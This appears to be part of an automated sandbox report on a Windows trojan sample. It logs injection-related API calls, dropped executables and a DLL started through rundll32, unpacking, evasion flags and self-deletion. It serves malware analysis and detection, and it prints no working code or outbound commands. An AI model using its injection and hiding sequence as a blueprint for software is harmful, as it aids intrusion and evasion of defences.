                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401427 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013F5 NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040138D NtAllocateVirtualMemory,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F9D GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,RtlCreateUserThread,strstr,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401400 NtAllocateVirtualMemory,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401427 NtAllocateVirtualMemory,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004013F5 NtAllocateVirtualMemory,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_0040138D NtAllocateVirtualMemory,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00402F9D CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: ADCA.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: 5AF.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: dfhwrav.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: webio.dll
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
                Source: 5AF.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.9896875
                Source: file.exeVirustotal: Detection: 33%
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\dfhwrav C:\Users\user\AppData\Roaming\dfhwrav
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5AF.exe "C:\Users\user\AppData\Local\Temp\5AF.exe"
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dfhwravJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ADCA.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@13/9@36/7
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006FC9EE CreateToolhelp32Snapshot,Module32First,
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeUnpacked PE file: 10.2.ADCA.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 16.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 22.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\dfhwravUnpacked PE file: 9.2.dfhwrav.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeUnpacked PE file: 10.2.ADCA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 16.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 22.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F47 pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F62 pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401E7D pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F2F pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F3A pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004019C7 push esp; retf
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402DCB push FFFFFF9Bh; retf
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071A2E push esp; retf
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071F96 pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071FA1 pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071FAE pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071FC9 pushad ; ret
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071EE4 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F47 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F62 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401E7D pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F2F pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F3A pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004019C7 push esp; retf
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00402DCB push FFFFFF9Bh; retf
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1A2E push esp; retf
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1EE4 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1FC9 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1FAE pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1FA1 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006D1F96 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006FDD39 push esp; retf
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_00422F40 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_025CB597 pushad ; iretd
                Source: Serpodtudpwhhta.dll.10.drStatic PE information: section name: .didata
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dfhwravJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5AF.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeFile created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ADCA.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dfhwravJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dfhwrav:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0085E760 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
